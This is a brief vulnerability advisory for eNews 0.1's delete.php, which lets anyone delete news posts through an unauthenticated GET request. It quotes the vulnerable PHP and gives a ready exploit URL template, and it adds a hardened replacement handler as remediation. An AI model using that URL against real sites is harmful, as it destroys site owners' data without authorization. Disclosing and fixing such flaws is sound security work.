eNews 0.1 (delete.php) Arbitrary Delete Post Vulnerability

Author: iLker Kandemir [MEFISTO]
Script download : http://www.hotscripts.com/Detailed/81086.html
script demo : http://emvvy.com/demos/enews/
site : www.dumenci.net
----------------------------------------------------------------
//poc:

if ((isset($_GET['delete'])) && ($_GET['delete'] != "")) {
  $deleteSQL = sprintf("DELETE FROM news WHERE id=%s",
                       GetSQLValueString($_GET['delete'], "int"));
----------------------------------------------------------------
//exploit :

http://[site]/delete.php?delete=[eNews_id]
----------------------------------------------------------------
tnx : aLL my FriEndZ
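The excerpt above already casts the id to an integer, so the weakness is the missing access control: the visible code performs no authentication check and deletes on a plain GET request. A hardened delete handler, as an added example (not code from eNews or from the advisory's author); the session keys `is_admin` and `csrf_token`, the `csrf_token` form field, the `respond()` helper and the PDO connection placeholders are assumptions:

```php
<?php
// Added example: hardened delete handler. Assumed names (not from eNews):
// $_SESSION['is_admin'], $_SESSION['csrf_token'], POST field 'csrf_token',
// respond(), and the placeholder DSN / DB_USER / DB_PASS values.
declare(strict_types=1);
session_start();

function respond(int $status, string $msg): void
{
    http_response_code($status);
    header('Content-Type: text/plain; charset=utf-8');
    exit($msg);
}

// 1. A state-changing action must not be reachable by GET (links, <img>, crawlers).
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header('Allow: POST');
    respond(405, 'Method not allowed');
}

// 2. Authorization: only a logged-in administrator may delete news items.
if (empty($_SESSION['is_admin'])) {
    respond(403, 'Forbidden');
}

// 3. CSRF: compare the per-session token in constant time.
$sent = $_POST['csrf_token'] ?? '';
$expected = $_SESSION['csrf_token'] ?? '';
if (!is_string($sent) || !is_string($expected) || $expected === ''
    || !hash_equals($expected, $sent)) {
    respond(403, 'Invalid CSRF token');
}

// 4. Validate the id strictly as a positive integer (null = missing, false = invalid).
$id = filter_input(INPUT_POST, 'delete', FILTER_VALIDATE_INT,
                   ['options' => ['min_range' => 1]]);
if ($id === null || $id === false) {
    respond(400, 'Invalid id');
}

// 5. Parameterized DELETE against the same `news` table as the excerpt.
$pdo = new PDO('mysql:host=localhost;dbname=DB_NAME;charset=utf8mb4',
               'DB_USER', 'DB_PASS', [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$stmt = $pdo->prepare('DELETE FROM news WHERE id = :id');
$stmt->bindValue(':id', $id, PDO::PARAM_INT);
$stmt->execute();

// 6. Tell the caller whether a row was actually removed.
$deleted = $stmt->rowCount() === 1;
respond($deleted ? 200 : 404, $deleted ? 'Deleted' : 'No such news item');
```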